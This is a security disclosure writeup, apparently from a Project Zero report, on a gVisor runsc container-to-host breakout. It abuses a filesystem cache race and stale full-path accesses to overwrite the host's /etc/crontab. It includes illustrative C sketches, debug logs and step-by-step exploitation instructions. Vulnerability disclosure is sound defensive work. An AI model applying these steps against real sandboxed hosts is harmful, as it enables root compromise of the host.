gVisor runsc guest->host breakout via filesystem cache desync

The following writeup describes an attack that can be used to overwrite files in the host filesystem (/etc/crontab in my PoC) from inside a Docker container that uses gVisor's runsc. I tested using a gVisor build from https://storage.googleapis.com/gvisor/releases/nightly/latest/runsc , with "--platform=kvm", on Debian Stretch; and also with a custom build based on the master branch, with some extra logging.

gVisor emulates a lot of syscalls in a seccomp-sandboxed host userspace process. One of the most interesting sets of syscalls is gVisor's VFS implementation, because it uses the host's filesystem as backing storage, allowing the guest to, for example, create arbitrarily-named files, directories and symlinks under the directory used as backing storage.

The seccomp-sandboxed host userspace process can't directly access the host filesystem; therefore, UNIX domain sockets are used to talk to an unsandboxed helper, using a protocol that seems to be vaguely based on the Plan 9 Filesystem Protocol.

For most host filesystem accesses, the unsandboxed helper process (implemented in runsc/fsgofer/fsgofer.go) uses careful manual O_NOFOLLOW/AT_SYMLINK_NOFOLLOW accesses. However, as a comment correctly explains, there are also places that improperly just use filesystem syscalls with full paths instead of the *at() family:

    // TODO: hostPath is not safe to use as path needs to be walked
    // everytime (and can change underneath us). Remove all usages.
    hostPath string

These places are:

 - Open() if LazyOpenForWrite is active and write access is requested
 - SetAttr() if LazyOpenForWrite is active
 - SetAttr() with ATime/MTime if the target is a symlink
 - Rename()

I'm going to focus on Open() with LazyOpenForWrite in this writeup. In an environment where LazyOpenForWrite isn't set, Rename() would probably also have a good chance of being exploitable.
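
The hazard named in the TODO comment (a cached path string that "can change underneath us") can be reproduced harmlessly in a scratch directory. The following is a minimal sketch in C, not gVisor code: it caches both a path string and a directory fd for the same directory, renames an ancestor, plants a symlink under the old name, and then compares a full-path open() with an fd-relative openat(). All names (`stale_host_path_demo`, `struct demo_result`, "outside", "by_path", "by_fd") are hypothetical, and "outside" merely stands in for a location the cached path was never meant to reach.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Where each style of open ended up creating its file (hypothetical type). */
struct demo_result {
    int path_open_escaped; /* 1 if the full-path open landed in "outside/etc" */
    int at_open_escaped;   /* 1 if the fd-relative open landed in "outside/etc" */
};

/* Runs the demo in a fresh directory under /tmp (left behind for inspection).
 * Returns 0 on success, -1 if any setup step fails. */
int stale_host_path_demo(struct demo_result *res)
{
    char base[] = "/tmp/hostpath-demo-XXXXXX";
    char host_path[PATH_MAX];
    char full[PATH_MAX + 32];

    assert(res != NULL);
    if (mkdtemp(base) == NULL)
        return -1;
    int basefd = open(base, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (basefd < 0)
        return -1;

    /* "outside" plays the role of a tree that must not be reachable. */
    if (mkdirat(basefd, "outside", 0700) != 0 ||
        mkdirat(basefd, "outside/etc", 0700) != 0)
        return -1;

    /* Create root/etc and remember it twice: as a string and as an fd. */
    if (mkdirat(basefd, "root", 0700) != 0 ||
        mkdirat(basefd, "root/etc", 0700) != 0)
        return -1;
    snprintf(host_path, sizeof(host_path), "%s/root/etc", base);
    int etc_fd = openat(basefd, "root/etc",
                        O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (etc_fd < 0)
        return -1;

    /* Desynchronize: move the ancestor away and put a symlink in its place.
     * The cached string now has a symlink as a non-last component. */
    if (renameat(basefd, "root", basefd, "root_") != 0)
        return -1;
    if (symlinkat("outside", basefd, "root") != 0)
        return -1;

    /* (1) Full-path open through the stale string. O_NOFOLLOW only guards
     * the last component, so the symlink in the middle is followed. */
    snprintf(full, sizeof(full), "%s/by_path", host_path);
    int fd = open(full, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    close(fd);

    /* (2) fd-relative open: resolution starts at the directory itself. */
    fd = openat(etc_fd, "by_fd", O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    close(fd);

    res->path_open_escaped =
        faccessat(basefd, "outside/etc/by_path", F_OK, 0) == 0;
    res->at_open_escaped =
        faccessat(basefd, "outside/etc/by_fd", F_OK, 0) == 0;
    close(etc_fd);
    close(basefd);
    return 0;
}
```

Calling `stale_host_path_demo(&r)` should leave `r.path_open_escaped` set and `r.at_open_escaped` clear: the string-based open follows the planted symlink, while the fd-based open stays with the directory that was originally opened (now reachable as "root_/etc").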

Exploitation of this bug from the seccomp-sandboxed host process would probably be rather simple, since the unsandboxed helper makes no attempt to prevent the sandboxed host process from forcing a cache desynchronization:

 - create a directory "root" at the root, open it as handle A (hostPath="{...}/root")
 - create a directory "etc" at handle A, open it as handle B (hostPath="{...}/root/etc")
 - at the root, move "root" to "root_". note that this doesn't change the hostPath of handle B! now the filesystem cache in the unsandboxed helper is desynchronized.
 - at the root, create a symlink named "root" that points to "/". at this point, the hostPath of handle B contains a symlink as a non-last component.
 - open "crontab" at handle B for writing

However, an attack from the sandboxed helper process is rather uninteresting - an attack from inside the sandboxed guest would be much more interesting.

What makes an attack from inside a guest harder is that the VFS layer in the sandboxed helper process attempts to ensure consistency between its dentry cache, the hostPaths in the unsandboxed helper, and the host filesystem. In particular, when a directory is being renamed, Rename() in dirent.go calls Busy() to flush out all dentries under the renamee; if that is not possible because one of the dentries is active, rename() fails with -EBUSY.

But there is a race condition that can be abused to desynchronize the dentry cache of the sandboxed helper such that two dentries refer to the same backing file: If a directory is looked up by the path walk code (Dirent::walk()) while simultaneously being moved (Rename()), it can happen that the lookup creates a positive dentry under the old name.

Rename() holds mutexes (`.mu`) on the old and new parent of the renamee, and Dirent::walk() is also invoked with the `.mu` mutex held on the directory under which a lookup is performed, so at first, this might look implausible.
However, when Dirent::walk() is invoked with walkMayUnlock==true, the lookup slowpath can temporarily drop the mutex:

    // Slow path: load the InodeOperations into memory. Since this is a hot path and the lookup may be expensive,
    // if possible release the lock and re-acquire it.
    if walkMayUnlock {
        d.mu.Unlock()
    }
    c, err := d.Inode.Lookup(ctx, name)
    if walkMayUnlock {
        d.mu.Lock()
    }

The lookup slowpath then attempts to account for possible races by checking whether the parent now has a child named `name`; however, in a race with Rename(), the other child may have already been moved to another name.

To trigger this, my PoC does the following:

 - create a working directory for the attack and chdir() into it
 - mkdir("old_")
 - create a file "old_/file"
 - rename "old_" to "old"; this forces the dentry for "old_/file" to be flushed via .Busy(), which in turn causes the dentry for "old_" / "old" to no longer have any strong references; therefore, after rename, the dentry disappears
 - perform the following two operations in parallel:
    - open "old" as `dirfd`, with O_PATH
    - rename "old" to "new"
 - verify that the race was successful by attempting to open "{dirfd}/file" for writing. if the race was successful, this will fail with -ENOENT.
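
The steps above can be sketched roughly as follows. This is not the attached PoC: it is a simplified illustration that uses fork() for the two parallel operations and makes no attempt to tune the timing, so the window would be hit rarely, if at all. The function names `enter_scratch_dir` and `try_race_once` are hypothetical. On an ordinary Linux kernel the check can never report a desynchronization, because a directory fd keeps following its directory across a rename.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Create a private working directory and chdir() into it. 0 on success. */
int enter_scratch_dir(void)
{
    char tmpl[] = "/tmp/race-sketch-XXXXXX";
    if (mkdtemp(tmpl) == NULL)
        return -1;
    return chdir(tmpl);
}

/* One attempt at the race, relative to the current directory.
 * Returns 1 if "{dirfd}/file" unexpectedly fails with ENOENT (the
 * desynchronized state described above), 0 if nothing unusual was
 * observed, and -1 on a setup error. */
int try_race_once(void)
{
    int result = 0;

    if (mkdir("old_", 0700) != 0)
        return -1;
    int fd = open("old_/file", O_WRONLY | O_CREAT, 0600);
    if (fd < 0)
        return -1;
    close(fd);
    /* Renaming once is what, per the writeup, flushes the cached dentries. */
    if (rename("old_", "old") != 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: the rename half of the race. */
        _exit(rename("old", "new") == 0 ? 0 : 1);
    }

    /* Parent: the lookup half of the race. */
    int dirfd = open("old", O_PATH | O_DIRECTORY);

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    assert(WIFEXITED(status)); /* the child only ever calls _exit() */

    if (dirfd >= 0) {
        /* With a consistent cache, dirfd refers to the renamed directory
         * and "file" is found. ENOENT here means dirfd is a second view
         * of the directory under its old name. */
        fd = openat(dirfd, "file", O_WRONLY);
        if (fd < 0 && errno == ENOENT)
            result = 1;
        if (fd >= 0)
            close(fd);
        close(dirfd);
    }

    /* Best-effort cleanup so the attempt can be repeated. */
    unlink("new/file");
    rmdir("new");
    return result;
}
```

A caller would run `enter_scratch_dir()` once and then loop over `try_race_once()` until it returns 1; a thread-based variant with tighter synchronization would presumably hit the window more often.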

When successful, the race works as follows (debug output from gvisor patched to add extra logging; the pointer is the address of `ctx`; manually added indent to show which context a line is for):

    W0809 19:11:28.456815 1 x:0] Rename-0xc4200c2900 entry for "old" => "new"
    W0809 19:11:28.457042 1 x:0]   walk-0xc4200c2000 for "old" looking for child
    W0809 19:11:28.457071 1 x:0]   walk-0xc4200c2000 for "old" found child ref
    W0809 19:11:28.457097 1 x:0]   walk-0xc4200c2000 for "old" dropping lock
    W0809 19:11:28.457212 1 x:0] Rename-0xc4200c2900 "old" => "new" has locked parent(s)
    W0809 19:11:28.457235 1 x:0] walk-0xc4200c2900 for "old" looking for child
    W0809 19:11:28.457657 1 x:0] walk-0xc4200c2900 for "new" looking for child
    W0809 19:11:28.457713 1 x:0] walk-0xc4200c2900 for "new" found child ref
    W0809 19:11:28.457754 1 x:0] walk-0xc4200c2900 for "new" found hard child ref
    W0809 19:11:28.458050 1 x:0] Rename-0xc4200c2900 removing old child "old"
    W0809 19:11:28.458115 1 x:0] Rename-0xc4200c2900 inserting new child "new"
    W0809 19:11:28.458204 1 x:0]   walk-0xc4200c2000 for "old" retook lock

As you can see, the walk performed for context 0xc4200c2000 encounters the weak reference for "old", removes it, then drops the lock while doing the actual lookup; context 0xc4200c2900 grabs the lock for the rename and performs the entire rename; then context 0xc4200c2000, which performed a successful lookup and was waiting on the lock, retakes the lock and validates that no children named "old" exist 'yet'.

At this point, the method got_enoent() in my PoC executes. It creates the directories "new/subdir" and "new/subdir/etc" as well as a file "new/subdir/etc/crontab", to which a writable reference will exist at this point. It then flushes the dentry for "new/subdir/etc/crontab" by renaming "new/subdir/etc" back and forth; this gets rid of the writable reference. Afterwards, "new/subdir/etc/crontab" is opened with O_RDONLY - this time creating only a readonly reference.
Next, an O_PATH fd to "new/subdir/etc" is created, stored as `etc_fd`.

So far, all actions in "new/" have been through a single, consistent view. But now, `dirfd` is used to swap out the newly-created directory structure while the normal view has active references to it: "{dirfd}/subdir/etc/crontab", "{dirfd}/subdir/etc" and "{dirfd}/subdir" are removed; then a symlink pointing to "/" is placed at "{dirfd}/subdir". From now on, when the unsandboxed helper attempts to access `etc_fd` using the full pathname, it will actually follow a symlink and land at the host's "/etc".

Next, "{etc_fd}/crontab" is opened for writing and attacker-controlled data is written into it, then fsync()ed; this causes the unsandboxed helper to open the host's real /etc/crontab and write attacker-controlled data into it.

I have attached the PoC as gvisor_swizzle_poc.c. To run it, create a Docker container running Ubuntu, as in the gvisor README ("docker run --runtime=runsc -it ubuntu /bin/bash"), then compile and run the PoC in there. Afterwards, you should see that /etc/crontab on the host has been overwritten; and after about a minute, output from `id` running as root should show up in "/tmp/pwned" on the host.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Found by: jannh